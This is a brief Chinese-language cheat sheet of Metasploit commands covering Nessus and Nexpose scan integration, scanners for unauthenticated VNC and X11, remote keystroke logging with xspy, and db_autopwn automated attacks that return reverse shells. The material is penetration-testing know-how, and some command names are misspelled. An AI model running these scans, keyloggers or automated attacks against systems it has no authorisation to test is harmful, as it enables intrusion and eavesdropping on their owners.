1.常用普通功能
db_destory //删除数据库
nc ip port //获取基本系统信息
2.nexpose
连接数据库
load nexpose //载入nexpose插件
msf > help
msf > nexpose_connect -h //查看连接nexpose需要的参数
msf >nexpose_connect 用户名:密码 ip地址 ok——登录到nexpose
msf >nexpose_scan //开始扫描
msf > db_hosts -c adress //安地址分类查看结果
msf >db_vulns //查看详细信息
3.nessus
msf >load nessus
msf >nessus_help
msf >nessus_policy_list //查看扫描选项
msf >nessus_sacn_new 选项号 任务名字 IP地址
msf >nessus_scan_status //扫描状态
msf >nessus_report_list //所有扫描结果报告
msf >nessus_report_get ID号 //下载某个报告
4.其他
vnc无密码扫描
msf > use auxiliary/scanner/vnc/vnc_none_auth
x11无密码扫描
msf > use auxiliary/x11/open_x11
xspy远程键盘记录
./xspy -display ip地址
导入漏洞扫描工具生成文件实现自动化攻击
db_autopwn -e -t -r -x -p
e(所有目标发起攻击)
t(显示所有匹配的模块)
r(反弹shell的攻击载荷)
x(根据漏洞选择攻击模块)
p(根据开放的端口选择攻击模块)
攻击成功返回一个shell